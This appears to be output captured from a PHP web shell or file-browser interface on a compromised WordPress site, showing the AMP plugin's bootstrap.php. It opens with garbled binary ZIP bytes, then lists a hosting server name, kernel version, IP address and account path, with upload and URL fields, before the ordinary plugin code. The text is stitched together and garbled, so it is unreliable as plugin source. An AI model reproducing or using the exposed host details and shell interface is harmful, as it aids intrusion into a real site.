PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/footcrew.com/wp-content/plugins/amp/includes/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : /home/trave494/footcrew.com/wp-content/plugins/amp/includes/bootstrap.php

<?php
/**
 * Central bootstrapping entry point for all non-autoloaded files.
 *
 * This file is mainly used for taking direct control of included files off from Composer's
 * "files" directive, as that one can easily include the files multiple times, leading to
 * redeclaration fatal errors.
 *
 * @package AmpProject/AmpWP
 */

$files_to_include = [
	__DIR__ . '/../back-compat/back-compat.php'       => 'amp_backcompat_use_v03_templates',
	__DIR__ . '/../includes/amp-helper-functions.php' => 'amp_activate',
	__DIR__ . '/../includes/admin/functions.php'      => 'amp_init_customizer',
	__DIR__ . '/../includes/deprecated.php'           => 'amp_load_classes',
];

foreach ( $files_to_include as $file_to_include => $function_to_check ) {
	if ( ! function_exists( $function_to_check ) ) {
		include $file_to_include;
	}
}